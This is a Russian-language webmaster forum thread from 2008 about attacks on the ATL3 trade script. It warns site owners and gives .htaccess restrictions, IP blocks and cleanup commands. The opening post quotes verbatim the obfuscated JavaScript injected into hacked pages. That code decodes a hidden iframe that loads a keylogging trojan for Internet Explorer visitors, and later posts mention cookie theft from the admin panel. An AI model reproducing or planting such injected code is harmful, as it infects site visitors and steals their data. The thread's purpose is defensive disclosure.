Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Вниманию тех кто юзает ATL3! - серьезная уязвимость!
цитата
16/03/08 в 02:26
 Remy
На этой недели ломанули один из моих тгп, да так что убило установленную на нем ванилуТГП.
Все файлы этого скрипта и генерируемых страниц, были прописаны яваскриптом, который через иФрейм подгружал вирусяку.
Вначале я был уверен, что взлом произошел через дырки в скриптах ваннилы. Целые сутки я и ребята с сапорта моего хостинга разбирались - кто и как(через что) ломанул сайт. Оказалось виновник - атл, несмотря на то, что у меня стоял 16 апдейт, в котором, вроде, были пофиксаны ошибки безопасности.

Ближе к делу, проверьте не заражен ли ваш саит - проверьте ХТМЛ код индекса и др. стр. сайта на присутствие след. кода:
Код:
<script> var s='3C696672616D65207372633D22687
474703A2F2F7365786F6E6E65742E636F6D2F746F706C6973742F
7A2F7374617469632E706870222077696474683D3220686569676
8743D32207374796C653D22646973706C61793A6E6F6E65223E3C
2F696672616D653E';
var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);}
var v=navigator.appVersion;
if (v.indexOf('MSIE 6.0') != -1){
document.write(unescape(o));}
if (v.indexOf('MSIE 5.') != -1){
document.write(unescape(o));}</script>

(если ваш анивирь не гудит, когда вы заходите на ваш сайт, это назначит, что вам повезло и заразы нет - НОД например не видет этой гадости!)
Этот явакод прописывает следующий ХТМЛ в страницу:
Код:
<iframe src="_чttp://sexonnet.com/toplist/z/static.php" width=1 height=1></iframe>

(урл загрузки может быть другим.)
... какие скрытые функции выполняет static.php я не знаю, но в итоге он подгружает - animan.class, это загрузчик самого трояна.
И несколько слов о том, что это за троян - насколько мне известно - это **02.ехе файл, представляющий из себя сканер клавы и грабер экрана icon_sad.gif

По этому предлагаю обезопасить ваши сиджи:
1. ограничев доступ к файлом скрипта, а именно к скрипту через которого произходит взлом -
../cgi-bin/at3/x/x2.cgiсоздав в директории ../cgi-bin/at3/x/ файл .htaccess с таким содержанием:
Код:
<Files x2.cgi>
Order Deny,Allow
Deny from all
Allow from ВашИП1
Allow from ВашИППрокси2
</Files>

если у вас динамический ИП(у большинства), то добавьте только ИП покси из под которого вы работаете.
Если вы не пользуетесь прокси и не имеете постоянного ИП у провайдера, тогда есть вариант описанный здесь:
чttp://www.askdamagex.com/t24283-sites-got-hacked.html

Обратите внимание! После этого действия новые трейдеры не смогут к вам добавляться!

2. Аналогично вышеописанному примеру, добавьте .htaccess в ../cgi-bin/at3/ с таким кодом:
Код:
<Files admin.cgi>
Order Deny,Allow
Deny from all
Allow from ВашИП1
Allow from ВашИППрокси2
</Files>


3. На данный момент выявлено всего 2-а сервака, откуда производились взломы, вот их ИП: 203.117.111.106 и 195.5.116.250
Рекомендую закрыть доступ с сайту этим ИП, добавив следующий код к .htaccess в корневой директории. Это удобно сделать через админку АТЛ - меню: ip daemon, и добавляем этот код в поле "IP Daemon - htaccess Header"
Код:
order deny,allow
deny from 203.117.111.106
deny from 195.5.116.250
allow from all


4. Если сайт был хакнут, надо отыскать на нем один из двух файлов, sync.php и/или backup.php.
выполните из шелла updatedb (права рута) и locate sync.php. Удалите найденные, кроме /st/admin/sync.php - это файл смарта его не трогать!!! (если у вас он установлен)

5. Удалите код из зараженных станиц, найти их можно создав в шелле скрипт (в домашней директ. сайта)-
sed.sh
Код:

#!/bin/sh
# for fname in `cat report.txt`; do
cat $fname | sed 's/                       .*<script> var s.*<\/script>                .*//g' > $fname.temp

if [ ! "`cat $fname.temp | md5sum`" = "`cat $fname | md5sum`" ]; then
        cat $fname.temp > $fname
fi
rm $fname.temp
done

и выполните его. Результат - файл report.txt со списком инфицированных файлов.

Что бы вырезать код из ваших страниц - выполните в шеле: Код:
grep -H "<script> var s=" /home/dir -R | cut -d: -f1


5. Переинстальте все скрипты(ТГП, Ротаторы, СЖ).

Надеюсь это кому-то поможет.

пс. ИМХО ломают связки - атл3+смарт, атл3+ванилла(гробит саму ванилу) и атл3+стрим. icon_sad.gif

Последний раз редактировалось: Remy (20/03/08 в 23:20), всего редактировалось 2 раз(а)
цитата
16/03/08 в 02:41
 Remy
http://www.finjan.com/GetObject.aspx?ObjId=443 (в пдф-е) - вот тут все про это вирус! Очень интересная статья, рекомендую.
цитата
16/03/08 в 04:27
 Kitaa
Remy писал:
Оказалось виновник - атл, несмотря на то, что у меня стоял 16 апдейт, в котором, вроде, были пофиксаны ошибки безопасности.

Нечего там не пофиксено, еще в начале января писали что как ломали так и ломают ат3, если хтацесс не защищен.
цитата
16/03/08 в 07:54
 Damas
Я защитил свои сиджи - снес АТ3 нахер.
цитата
16/03/08 в 08:10
 goodlover
Мда, нехорошая репутация у atl3 теперь.
цитата
16/03/08 в 09:23
 Starforce


что самое интересное, на нем по прежнему сидят ) и собственно альтернатив то ему почти нет ))
цитата
16/03/08 в 09:58
 Renegat
Достаточно одного уже существующего .htaccess в папке ../cgi-bin/

Дописать в него:

<FilesMatch "(admin|x2|login)\.cgi">
Order Deny,Allow
Deny from All
Allow from Ваш IP1
Allow from Ваш IP2
</FilesMatch>

Starforce
АТХ отличный скрипт, и то что его ломают не значит что он полное Г...
80% компьютеризированного населения нашей планеты сидит на продукции компании Майкрософт, которую ломают по 10 раз в день. Дань популярности.

И вовсе не означает что тот же Протон, Фет или ATS в 100 раз устойчивее к взлому и т.д. Ими просто никто серьезно не занимался, ибо процент проектов на них достаточно мал, и проще "докапаться" до одного АТХ чем до их всех вместе взятых.

Понимая все это, куда либо переходить с продукции Arrow Scripts не собираюсь. Авторы думаю не дураки, в ближайшее время будет апдейт и не один. Через пару месяцев обещали АТХ 2.0 выпустить и т.д.

А пока нормально настроенного файрвола на сервере и грамотно прописанного .htaccess думаю хватит (я на всякий случай еще скрипт ротатора закрыл).
цитата
16/03/08 в 12:24
 color
можно просто в конфиг апача это добавить чтобы на каждый сидж не создавать htaccess
цитата
16/03/08 в 12:31
 Anab0L1k
Вредоносный код вставляется через меню toplists (в АТ3) - это меню позваляет создать любой файл на сервере. Чтобы получить доступ к админке АТ3 злоумышленник(-и) воруют cookies. ТС проверь у себя в security log'е предварительно выключив выполнение JavaSript'ов в браузере - там будет строка типа 203.117.111.106 tryed to login with user / pass. На самом деле там еще есть скрытый код (можно посмотреть в сорсе) который отсылает куку.
цитата
16/03/08 в 13:23
 Tsumibit0
Цитата:

что самое интересное, на нем по прежнему сидят ) и собственно альтернатив то ему почти нет ))


альтернативы какраз то есть, и вполне достойные..... просто многим впадлу пробовать и разбираться в новых скриптах....
цитата
16/03/08 в 13:37
 greencore
Tsumibit0 писал:
альтернативы какраз то есть, и вполне достойные..... просто многим впадлу пробовать и разбираться в новых скриптах....
посоветуй плз
цитата
16/03/08 в 14:32
 Tsumibit0
Цитата:
посоветуй плз


фтт, атс, протон, фет, епт... собственно есть и другие за %....
у каждого есть свои "+" и "-", но выбор очень даже есть....

думаю это тема данной ветки обсуждать на что поменять ат3.... это совсем отдельная история....

если фтт решишь попробовать, велком в асю, поделюсь опытом.... ;)
цитата
16/03/08 в 15:12
 wMaster
Remy писал:
http://www.finjan.com/GetObject.aspx?ObjId=443 (в пдф-е) - вот тут все про это вирус! Очень интересная статья, рекомендую.

статья от 2-го квартала 2007-го, наверняка уже должно быть лекраство.
цитата
16/03/08 в 15:53
 supphosting.com
Мы на всех дедиках с сиджами заблокировали файрволом айпишки с которых ломают атл. По крайней мере на какое-то время защитили.
цитата
16/03/08 в 23:09
 Doctor


ну, эт бессмысленно практически... думаю с новыми айпишками у уродов проблем нет... последняя атака вот отсюда например - 202.83.197.228
цитата
17/03/08 в 05:18
 FatMike
Doctor писал:
ну, эт бессмысленно практически... думаю с новыми айпишками у уродов проблем нет... последняя атака вот отсюда например - 202.83.197.228


Док..опять поломали или просто продолжают пытаться?
цитата
17/03/08 в 10:45
 Blink
А я был уверен, что виновен скрипт хирамакса. Давно было желание поменять AT3 на ATS, но сомневался. Теперь сомнений не осталось.

Последний раз редактировалось: Blink (21/03/08 в 17:11), всего редактировалось 1 раз
цитата
17/03/08 в 12:03
 shahfil
Blink писал:
Давно было желание поменять AT3 на ATX, но сомневался. Теперь сомнений не осталось.


А atx типа так не ломается чтоли?
цитата
17/03/08 в 12:57
 sky_diver
Уже давно пора было позакрывать доступы. Сколько раз ломали его уже, и обсуждали это не один раз.
цитата
17/03/08 в 17:29
 Spaceman
Если надоели взломы - вот здесь можно найти сервис, который может сильно облегчить жизнь. Регистрируемся и пользуемся, пока все бесплатно ;)

Оффтопик: P.S. Сорри если так нельзя делать... Уважаемые модераторы, не сочтите за спам - замечал, что владельцы многих сиджеевых скриптов рекламируют свои скрипты подобным образом
цитата
17/03/08 в 22:44
 Doctor
FatMike писал:
Док..опять поломали или просто продолжают пытаться?


Майк, попытки в логах эвридэй с разных айпи... взломов нет, т.к. х2.cgi закрыт
цитата
18/03/08 в 09:37
 Project
Doctor писал:
Майк, попытки в логах эвридэй с разных айпи... взломов нет, т.к. х2.cgi закрыт

Значит твой логин с паролем уже уплыл...
Бро, почитай здесь...

Да и все остальные получат пользу от этого топика...
Там очень подробно расписано как ломается АТ даже при заблоченом х2...
И скажу я вам, это не от популярности АТ, а от идиотизма разработчика, надо же додуматься в таком виде логи писать...
цитата
18/03/08 в 10:12
 saaas
Вот блин не понимаю зачем плодить темы об одном и том же ведь обсуждаеться все это в соседней ветке.
цитата
18/03/08 в 14:06
 sky_diver
Когда пишут о взломе и как защетится,остальным пох пока не поламали. Как только коснётся их,начинается одна и таже писанина. Я так это всё понимаю.
Закройте сразу все доступы и примите меры,о которых пишут. А вот,если уже и это не помагает,тогда надо трубить
цитата
19/03/08 в 16:53
 Nikso
если форма регистрации закрыта то пох на взломы или как?
Стр. 1, 2  >  последняя »


Эта страница в полной версии